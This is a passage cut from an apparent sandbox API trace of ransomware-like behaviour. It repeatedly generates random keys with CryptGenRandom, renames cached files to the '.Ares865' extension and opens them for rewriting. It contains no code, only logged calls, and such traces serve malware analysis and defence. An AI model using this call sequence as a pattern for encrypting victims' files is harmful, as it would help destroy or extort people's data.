pbBuffer=0x2ccce68) returned 1 [0109.913] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.918] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.919] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.919] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.920] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865") returned 123 [0109.920] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwFlags=0x1) returned 1 [0109.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220) returned 1 [0109.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.932] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.934] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.934] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.937] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.938] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.938] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865") returned 156 [0109.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.ares865"), dwFlags=0x1) returned 1 [0109.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0109.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.941] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.945] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.946] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.946] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.947] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865") returned 156 [0109.947] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.ares865"), dwFlags=0x1) returned 1 [0109.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0109.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.949] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.949] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.951] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.953] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865") returned 156 [0109.953] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.ares865"), dwFlags=0x1) returned 1 [0109.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=408) returned 1 [0109.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.955] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.955] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.955] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.962] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.962] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865") returned 156 [0109.963] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.ares865"), dwFlags=0x1) returned 1 [0109.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.965] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0109.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.966] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.966] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.966] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.972] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865") returned 156 [0109.973] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.ares865"), dwFlags=0x1) returned 1 [0109.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0109.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.975] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.983] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.996] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.996] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.997] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865") returned 156 [0109.997] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.ares865"), dwFlags=0x1) returned 1 [0109.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0109.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.999] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.002] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.003] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.003] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.004] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865") returned 156 [0110.004] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.ares865"), dwFlags=0x1) returned 1 [0110.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.006] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.006] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.006] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.009] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.010] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.010] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.011] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865") returned 156 [0110.011] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.ares865"), dwFlags=0x1) returned 1 [0110.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.012] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.013] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.013] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | 